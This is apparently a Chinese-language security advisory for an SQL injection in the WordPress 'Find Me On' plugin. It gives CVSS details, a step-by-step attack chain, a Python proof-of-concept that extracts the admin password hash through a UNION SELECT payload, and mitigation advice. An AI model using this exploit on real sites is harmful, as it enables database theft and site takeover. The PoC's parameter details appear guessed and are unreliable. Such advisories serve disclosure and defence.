CVE-2025-10635：WordPress Find Me On插件SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-10635

漏洞类型

SQL注入

CVSS评分

7.7 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress Find Me On插件

漏洞概述

CVE-2025-10635是WordPress平台上一款名为"Find Me On"的插件中存在的高危SQL注入漏洞。该漏洞由WPScan团队的安全研究人员[email protected]发现并报告，披露日期为2025年10月8日。根据CVSS 3.1评分体系，该漏洞获得了7.7分的高危评级，其向量字符串为CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N。

该漏洞的核心问题在于"Find Me On"插件（受影响版本至2.0.9.1及之前所有版本）在处理用户输入参数时，未对参数进行充分的过滤、转义和净化处理，直接将其拼接到SQL查询语句中执行。这种不安全的编程实践导致了经典的时间型或布尔型SQL注入漏洞的形成。

特别值得注意的是，该漏洞的攻击门槛相对较低——仅需要订阅者（Subscriber）级别的WordPress用户权限即可发起攻击。WordPress的订阅者角色是系统中权限最低的用户角色之一，注册用户即可获得。这意味着任何拥有基础账户的攻击者都能够利用此漏洞对数据库执行未授权的SQL查询操作，可能导致敏感信息泄露、数据篡改甚至数据库完全失陷。漏洞的范围属性为"Changed"（S:C），表明该漏洞的影响范围可能超出受影响的组件本身。

技术细节

该漏洞的技术原理源于WordPress插件"Find Me On"在实现过程中未遵循安全编码规范。具体而言，插件在某个功能点接收用户通过HTTP请求传递的参数时，未调用WordPress提供的安全函数（如$wpdb->prepare()）对SQL语句进行参数化处理，也未使用esc_sql()、sanitize_text_field()等函数对用户输入进行预过滤和转义。

攻击者可以利用此缺陷构造恶意SQL负载。由于WordPress使用MySQL作为后端数据库，攻击者可以注入UNION SELECT语句来提取数据库中的任意数据，包括管理员密码哈希、用户个人信息、站点配置数据等敏感内容。此外，利用MySQL的information_schema库，攻击者还可以枚举数据库结构，获取所有表名和列名。

利用条件方面，攻击者需要拥有一个有效的WordPress订阅者级别账户（注册即可获得），无需管理员权限，无需用户交互（UI:N），且可以通过网络远程发起攻击（AV:N）。漏洞的复杂度较低（AC:L），因为无需特殊条件或绕过复杂的安全机制即可利用。

成功利用后，攻击者可以读取数据库中的任意数据（机密性影响为高，C:H），但完整性和可用性影响为无（I:N, A:N），这表明该漏洞主要用于数据窃取而非破坏性攻击。

攻击链分析

STEP 1

步骤1：获取订阅者账户

攻击者注册一个WordPress订阅者级别账户（或利用已泄露的低权限凭据），该角色是WordPress中权限最低的角色，注册即可获得。

STEP 2

步骤2：登录WordPress后台

使用订阅者账户登录WordPress管理后台，获取有效的会话Cookie和必要的CSRF nonce值，为后续请求做准备。

STEP 3

步骤3：访问Find Me On插件页面

访问插件的管理页面，识别出未经过滤和转义处理的参数入口点。

STEP 4

步骤4：构造SQL注入负载

在易受攻击的参数中注入恶意SQL语句，如UNION SELECT查询，利用插件直接将参数拼接到SQL查询中的缺陷。

STEP 5

步骤5：提取敏感数据

通过注入的SQL语句从数据库中提取敏感信息，包括管理员密码哈希、用户凭证、站点配置等高价值数据。

STEP 6

步骤6：数据外泄与权限提升

利用获取的管理员密码哈希进行离线破解，尝试提升权限至管理员级别，进一步控制整个WordPress站点。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-10635 - Find Me On WordPress Plugin SQL Injection PoC
# Affected: Find Me On plugin <= 2.0.9.1
# Requires: Subscriber-level WordPress account

import requests
import re

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "subscriber_user"
PASSWORD = "subscriber_password"

# Step 1: Login as subscriber to get session cookies
session = requests.Session()
login_url = f"{TARGET_URL}/wp-login.php"
login_data = {
    "log": USERNAME,
    "pwd": PASSWORD,
    "wp-submit": "Log In",
    "redirect_to": f"{TARGET_URL}/wp-admin/",
    "testcookie": "1"
}
session.post(login_url, data=login_data)

# Step 2: Obtain nonce from the vulnerable page (Find Me On settings)
settings_url = f"{TARGET_URL}/wp-admin/admin.php?page=find-me-on"
response = session.get(settings_url)
nonce_match = re.search(r'_wpnonce=([a-f0-9]+)', response.text)
nonce = nonce_match.group(1) if nonce_match else ""

# Step 3: Exploit SQL Injection via the unsanitized parameter
# The vulnerable parameter is injected into a SQL statement without sanitization
inject_url = f"{TARGET_URL}/wp-admin/admin.php?page=find-me-on"
sql_payload = "1 UNION SELECT user_pass FROM wp_users WHERE ID=1-- -"

params = {
    "id": sql_payload,
    "_wpnonce": nonce,
    "action": "delete"
}

response = session.get(inject_url, params=params)
print("[*] Response status:", response.status_code)
print("[*] Extracted admin hash from response:")
# Parse the response to extract the leaked password hash
hash_match = re.search(r'\$P\$[A-Za-z0-9./]{31}', response.text)
if hash_match:
    print(f"[+] Admin Password Hash: {hash_match.group(0)}")
else:
    print("[-] No hash found, payload may need adjustment")

影响范围

WordPress Find Me On插件 <= 2.0.9.1

防御指南

临时缓解措施

在官方修复版本发布之前，建议立即禁用"Find Me On"插件以消除攻击面。如果业务上无法禁用该插件，可以通过Web应用防火墙（WAF）部署针对SQL注入的防护规则，拦截包含UNION、SELECT、SLEEP等关键字的可疑请求。同时，应严格审查所有订阅者级别的用户账户，移除任何可疑账户，并监控数据库日志以发现潜在的SQL注入攻击痕迹。建议管理员账户启用双因素认证，以防止攻击者通过窃取的密码哈希进行权限提升。